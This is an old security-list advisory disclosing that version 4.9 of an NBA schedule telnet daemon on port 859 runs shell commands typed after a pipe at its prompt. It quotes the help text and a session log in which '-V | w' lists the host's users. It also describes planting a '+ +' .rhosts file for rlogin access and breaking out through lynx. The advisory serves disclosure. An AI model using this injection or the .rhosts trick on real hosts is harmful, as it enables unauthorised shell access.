NBA 4.9 Allows Shell Access

[hdmoore () USA NET (HD Moore)]

Recently browsing the internet I came upon a link to telnet to a host on
port 859, apparently a NBA (National Basketball Association) telnet
daemon for showing game schedules, while I am not sure who wrote it, or
who uses it, it does create a major secuity hole on the machine it is
running.  At login, you recieve a prompt that looks like <nba>, if you
type anything then the 'pipe' character "|" followed by a shell comand,
that command is executed.  Doing this you could create a .rhosts file
containing the classic "+ +", then giving shell access through rlogin.
It is also possible to start lynx ( or some other program), then break
out into a shell from that program. If anyone knows the origin of this
program, or someone who uses it, please alert them to this fact.  Please
no flames concerning how stupid of a bug this is, it is still a bug =)

Below is a cut from a session log:

usage: /usr/local/bin/nba [-vh] [-nNUM] [-HA] [-C] [-E[d|w]] [-U[d|w]]
[TEAM|DIV
 [TEAM|DIV]] [mm/dd...]
 With -v, print version information and exit.
   This is version 4.9 for NBA 95-96.
 With -h, print this help message and exit.
 With no teams or divisions specified, print next NUM days (default=1)
of
   of league schedule from given date(s) (default is today if none
given).
 With one team or division, print next NUM games (default=3) for that
team
   or teams in that division.
 With two teams or divisions, print games where first team (or team
   in first division) plays second team (or team in second division).
 -H or -A: Print only home or away games, for first team or division.
 -C: Print monthly calendar format (specify month or default is
current).
 -E: Use European dates (dd/mm) and weeks (starting on Monday).
 -U: Use U.S. dates (mm/dd) and weeks (starting on Sunday).
 Teams can specified with or without leading -t, from the following
list:
   atl - Atlanta            bos - Boston             cha - Charlotte
   chi - Chicago            cle - Cleveland          dal - Dallas
   den - Denver             det - Detroit            gol - Golden State
   hou - Houston            ind - Indiana            lac - LA Clippers
   lal - LA Lakers          mia - Miami              mil - Milwaukee
   min - Minnesota           nj - New Jersey          ny - New York
   orl - Orlando            phi - Philadelphia       pho - Phoenix
   por - Portland           sac - Sacramento         san - San Antonio
   sea - Seattle            tor - Toronto            uta - Utah
   van - Vancouver          was - Washington
 Divisions can specified with or without a leading -d, from the
following list:
   pac - Pacific            mid - Midwest            ctl - Central
   atc - Atlantic
 The season runs from 11/3 to 4/21.

<nba> -V | w
/usr/local/bin/nba: unknown team or division code: -V
18:00  up 18 days, 14:14,  3 users,  load average: 0.29, 0.96, 0.94
User     tty        from             login@    idle   JCPU   PCPU what
xxxxxx p6         lichen           13:17    3days               -ksh
xxxxxx   p0         zlin             14:25    5days               -tcsh
xxxxxx  p7         petrie           15:13    2days  24:46     14 -csh
<nba> blah | lynx